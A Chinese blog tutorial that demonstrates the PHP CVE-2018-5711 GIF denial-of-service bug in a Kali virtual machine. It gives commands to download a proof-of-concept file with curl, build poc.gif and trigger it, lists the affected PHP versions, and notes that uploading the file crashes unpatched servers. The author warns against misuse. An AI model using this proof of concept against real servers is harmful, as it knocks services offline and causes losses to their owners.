logo
当前位置:首 页 > 编程技术 >服务器语言 > 查看文章
台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。

一、检测我的虚拟机是否装有php-gd库

1、运行命令:php -m | grep -i gd

2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd

二、生成恶意的gif文件

1、curl -L https://git.io/vN0n4 | xxd -r > poc.gif

2、运行top命令看下我的CPU使用率

3、测试恶意代码:

php -r ‘imagecreatefromgif(“poc.gif”);’

CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。

这个漏洞的影响版本范围如下:

PHP 5 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。

一个有大大梦想但是没有支撑这梦想的技术的攻城狮,大家就当这个博客是你的技术工具箱吧,我会吧我工作中遇到的问题贴在这,大家需要的记得把我放到收藏夹哦! 百度输入“子傲代码”就可以了

—— 陈子傲

admin
众说纷纭Comments
大眼 可爱 大笑 坏笑 害羞 发怒 折磨 快哭了 大哭 白眼 晕 流汗 困 腼腆 惊讶 憨笑 色 得意 骷髅 囧 睡觉 眨眼 亲亲 疑问 闭嘴 难过 淡定 抗议 鄙视 猪头
小提示:直接粘贴图片到输入框试试
努力发送中...
  • 评论最多
  • 最新评论
  • 随机文章
footer logo
未经许可请勿自行使用、转载、修改、复制、发行、出售、发表或以其它方式利用本网站之内容
Copyright ©ziao design Studio All Rights Reserved.沪ICP备14052271号-3